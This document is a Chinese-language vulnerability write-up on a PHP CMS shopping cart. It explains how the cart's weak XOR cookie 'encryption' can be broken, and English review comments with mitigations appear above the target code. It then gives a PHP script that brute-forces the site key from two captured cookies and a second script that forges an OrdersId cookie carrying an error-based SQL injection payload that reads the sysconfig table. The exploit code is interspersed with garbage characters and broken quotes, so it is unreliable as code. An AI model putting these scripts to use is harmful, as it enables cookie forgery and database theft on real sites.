www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中:
先看一下这个 shopcar 类是如何生成 cookie 的:
/**
 * Encrypts a value and stores it in a cookie.
 *
 * @param string       $key   cookie name
 * @param array|string $value cookie payload; arrays go through
 *                            $this->enCode() first (not shown here)
 *
 * NOTE(review): the cookie carries no integrity check (no MAC/signature),
 * so the server cannot distinguish a client-forged value from one it
 * issued. Any consumer that trusts the decrypted value (MemberShops reads
 * OrdersId from a cookie) must validate it itself. Mitigation: sign the
 * payload with a server-side secret and verify it on read, or keep cart
 * state server-side under a random session id.
 */
function saveCookie($key,$value)
{
    if(is_array($value))
    {
        // enCode() is not in this listing; the surrounding text describes
        // it as flattening the array into an "a=yy&b=cc" style string.
        $value = $this->enCrypt($this->enCode($value));
    }
    else
    {
        $value = $this->enCrypt($value);
    }
    // 36000 s (10 h) lifetime, site-wide path; no secure/httponly flags set.
    setcookie($key,$value,time()+36000,'/');
}
简单地说,$key 就是 cookie 的 key,$value 就是 value;enCode 的作用是将 array 类型转换为 a=yy&b=cc&d=know 这样的字符串,关键是 enCrypt 函数:
/**
 * Obfuscates $txt for storage in a cookie.
 *
 * Per call, the key is the hex MD5 of one rand(0, 32000) draw, so at most
 * 32001 distinct keys exist. Each plaintext byte is emitted as the key byte
 * used, followed by (plaintext byte XOR key byte); the interleaved stream
 * is then passed through setKey() and base64-encoded.
 *
 * @param string $txt plaintext
 * @return string base64-encoded cookie value
 *
 * NOTE(review): this is not encryption in any useful sense. The per-call
 * key comes from a ~32k-value space and is itself written into the output,
 * and the outer layer (setKey) is a fixed XOR keystream, so the site-wide
 * key is recoverable from a known plaintext/cookie pair (the surrounding
 * write-up demonstrates exactly that). Mitigation: replace with an
 * authenticated construction (a MAC over the payload using a server-side
 * secret) and never treat the cookie contents as unforgeable.
 */
function enCrypt($txt)
{
    // Reseeds the PRNG from the clock on every call; the single rand()
    // draw below is the only per-cookie randomness.
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // Cycle through the 32 hex characters of the key.
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        // The key byte is emitted in the clear in front of the XORed byte.
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    return base64_encode($this->setKey($tmp));
}
/**
 * XORs $txt with a fixed keystream derived from the site cookie secret.
 *
 * @param string $txt input bytes (the interleaved stream built by enCrypt)
 * @return string output of the same length as $txt
 *
 * NOTE(review): the keystream is md5(strtolower($cfg_cookie_encode)): a
 * 32-byte pattern over [0-9a-f] that repeats across the whole input and is
 * identical for every cookie the site issues. A static, low-entropy,
 * repeating XOR key is recoverable from known plaintext, and this key is
 * the only thing standing between a client and a forged cart cookie.
 * Mitigation: use $cfg_cookie_encode as a MAC secret rather than a cipher
 * key — sign the cookie and verify the signature before using its contents.
 */
function setKey($txt)
{
    global $cfg_cookie_encode;
    // Lower-casing the secret before hashing throws away case entropy.
    $encrypt_key = md5(strtolower($cfg_cookie_encode));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
enCrypt 的参数 $txt 我们是可知的;返回值就是 cookie 的值,这个我们也是可知的。
然后到了 enCrypt 调用 setKey 时的参数 $tmp,这个参数在某种意义上我们也是可知的:因为 $encrypt_key = md5(rand(0, 32000)) 只有 32000 种可能,我们可以推出 32000 种可能的 $tmp,从而推出 32000 种可能的 md5(strtolower($cfg_cookie_encode))。对了,忘记说了,我们的目的是推测出 setKey 中 $encrypt_key 的值,然后才能任意构造出购物车的 cookie。从推出的 32000 种 md5(strtolower($cfg_cookie_encode)) 中,简单过滤掉含非字母数字字符的 key,就只剩下几百个可能的 key;然后我们再重新下一次订单,再获取几百个可能的 key,取交集,得到最终 key。
具体代码如下:
<?php
1 {( `* I6 P, e" I1 T$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
; _: C: M; f: P/ b$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
0 f. C0 p6 a* T# h$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
2 L" A; t8 v6 Q) V4 e. i* Efunction reStrCode($code,$string)2 q: a {, f5 F6 D
{. r6 V6 J7 k0 K# p& `( o
$code = base64_decode($code);
5 b& L) l) t8 `$key = “”;
5 {! W7 x6 H1 ~, U0 G8 sfor($i=0 ; $i<32 ; $i++)- o% E4 h# }# t
{
+ O+ d5 }7 Y! W3 F$ G$key .= $string[$i] ^ $code[$i];1 u i0 ]4 e2 t! Z6 W; t7 s" u
}$ t1 f# u" ]( {- y! @/ K7 R
return $key;: }, f* z. R* A# o* h
}
' _& f* l0 \! ]6 I6 D+ K( Ifunction getKeys($cookie,$plantxt)" v6 b: d' z$ F3 e7 {
{
8 c0 @) k+ n! _$tmp = $cookie;
% ^' p0 |/ t6 N* X- [& e* d$results = array();
6 ?! J; T$ o0 g' E8 C' s5 N$ Ofor($j=0 ; $j < 32000; $j++)) T9 Q6 [, \6 G+ a5 h' ~( w' A: z7 Q
{
5 Y$ i: K: Z) Z% a) Q
5 T; ?( L$ a# I1 }0 p# x$ C+ R$txt = $plantxt;
' q% V5 I5 o; e1 _ K7 q" I$ctr = 0;/ t5 Z w) O! d# ^4 ?8 J/ B
$tmp = ”;
2 y& q; q3 t2 f9 U s1 A$encrypt_key = md5($j);
G4 z' Z8 k, k1 cfor($i =0; $i < strlen($txt); $i ++)# S8 R" @ d- F' S! e
{
: a" X% k1 w5 M" B, T' N( E: n8 T$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;6 n4 r# i3 c5 y1 v% Q
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
/ _" _: W7 o; G% o# g}2 a* x9 l/ g- B( B2 Y: B# K3 f
$string = $tmp;
" @8 s6 T$ l, L8 S" F/ f, ~$ m$code = $cookie;9 \, @. X% L. ^
$result = reStrCode($code,$string);9 Z- f$ l& y# q5 X$ N, k. _, O$ ` j
if(eregi(‘^[a-z0-9]+$’,$result))) b ?0 `$ |6 t' v
{7 |$ r( B+ s1 L+ U1 F- f3 [
echo $result.”\n”;
$ W) M( X# \3 \' n1 z$results[] = $result;
- z5 k2 G5 R9 K% d* m1 C: W}
& z1 a* V/ y b& {' F3 S8 D}; b! @- p) |; i% j F1 _9 Q
return $results;
/ p5 S# }* r) B- G6 O}$ n( |7 Q# j4 M% [
$results1 = getKeys($cookie1,$plantxt);" Q) c c' g# {' ^: y* S
$results2 = getKeys($cookie2,$plantxt);
c# ~9 [ s7 X) C U8 [print “\n——————–real key————————–\n”;$ ^3 c7 J7 r1 [6 [$ \
foreach($results1 as $test1)1 S2 j9 Y/ ^4 x! h/ f+ }- j
{# M: x C4 t+ {0 g+ S/ [
foreach($results2 as $test2)
% t1 [/ a" C4 q2 R' a2 J{9 c6 P7 O+ c, }$ k H* U
if($test1 == $test2)" K& u7 N' Z; H0 D+ x
{# X3 s# {) a1 A/ d# Y
echo $test1.”\n”;3 p. V9 y- c% `: u. a$ l
}
: Z0 p' q% H' }6 u}
5 _1 D7 j9 Y7 u) K5 Y \) q}
% G- v$ N3 D: I3 T?>
cookie1 和 cookie2 是我下了两次订单后分别生成的 cookie;
plantxt 可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出 md5(strtolower($cfg_cookie_encode))。
得到这个 key 之后,我们就可以构造任意购物车的 cookie。
接着看:
20 class MemberShops/ j. F0 f) E- g- ^5 I0 X
21 {
' C: D% @$ c; [- B2 m, Y( c22 var $OrdersId;
/ J+ J7 O+ m. B9 F( T23 var $productsId;. q z& [/ Y+ r5 Z' ]
24
/**
 * Restores the current order id from the "OrdersId" cookie, creating a
 * new order when the cookie is absent or empty.
 *
 * NOTE(review): $this->OrdersId is taken directly from a client-controlled
 * cookie; the only check applied here is empty(). getCookie() and
 * MakeOrders() are not in this listing, so whether either validates the
 * value cannot be confirmed — assume neither does. In /plus/carbuyaction.php
 * this value is interpolated into an SQL string (WHERE oid='$OrdersId').
 * Mitigation: validate the id against the format MakeOrders() produces
 * before accepting it, and bind it as a query parameter rather than
 * interpolating it.
 */
function __construct()
{
    $this->OrdersId = $this->getCookie("OrdersId");
    if(empty($this->OrdersId))
    {
        $this->OrdersId = $this->MakeOrders();
    }
}
发现 OrdersId 是从 cookie 里面获取的。
然后 /plus/carbuyaction.php 中的:
$cart = new MemberShops();
// Order id for this request; it originates from the client cookie
// (see MemberShops::__construct), not from the server.
$OrdersId = $cart->OrdersId;
……
// NOTE(review): $OrdersId is string-interpolated into the query with no
// escaping or validation visible in this excerpt — SQL injection via the
// cookie. Mitigation: use a prepared/parameterised statement, or at minimum
// reject any id that does not match the expected order-id format.
$rows = $dsql->GetOne("SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1");
接着我们就可以注入了。
通过利用下面代码生成 cookie:
<?php- d& N. C& i; v& @: H
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
% u; @6 W9 r4 }0 A% j$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
! H1 O( s9 O( r% | m [$ `function setKey($txt)
1 R& v8 ]' n$ m" t" j{
; |% v8 s5 p# ^; @6 H6 |; Jglobal $encrypt_key;1 A; w/ F$ @1 o* Q+ M
$ctr = 0;
0 S9 l( J7 A0 E( `* ~" r$tmp = ”;
1 b$ G$ K* b$ S( I' Hfor($i = 0; $i < strlen($txt); $i++)
2 Z# U% @8 S( @7 Z1 G+ m{. Q2 _0 ~3 _9 B1 y
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
- ~5 K+ e1 o4 Q/ z& i+ t$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];- g8 \2 L+ O k4 Y) O( z
}) s; F6 j: t( F6 F. ?
return $tmp;) t7 |7 g3 c' J: k6 T3 V. J2 O
}/ R# S9 U+ z& j3 V7 w
function enCrypt($txt)
1 C4 Y4 o& ?# s{
1 v( i, G( E" y- A ^srand((double)microtime() * 1000000);( V. J2 A, X- Q
$encrypt_key = md5(rand(0, 32000));
$ @! B2 w) Y' k0 L$ H$ctr = 0;
A* t- L) }+ _5 g! G# z5 V$tmp = ”;$ M% m3 X8 I& j
for($i = 0; $i < strlen($txt); $i++)
, [0 \; n8 _. V' @{
; h$ F: W5 {7 b5 W6 A' ?$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;( L% p1 K6 u m) b8 \0 a& l y9 B
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
/ R$ F; O9 |# `! z1 O8 h. ]' N}
8 b2 R, v8 X' w/ lreturn base64_encode(setKey($tmp));/ U! k7 T1 Z* K1 L) w
}) H4 u: ~ i6 H9 p! F S
for($dest =0;$dest = enCrypt($txt);)
1 g6 g' l6 d: @{
3 D i9 {3 R4 `& s9 f* Wif(!strpos($dest,’+'))5 |3 X6 g/ ^" U+ l. j' s" o( y
{9 x8 e2 I3 g# S9 I4 E0 d" P
break;
$ W1 C% C' }- W6 J6 @( c J% d}
; b0 G% S, l" T, R g1 E}& C6 f- |4 i7 p- `6 Z
echo $dest.”\n”;
' q9 }4 Z/ U# W3 V: m- L?>, r# E4 ~1 r. H6 Q+ M3 K9 C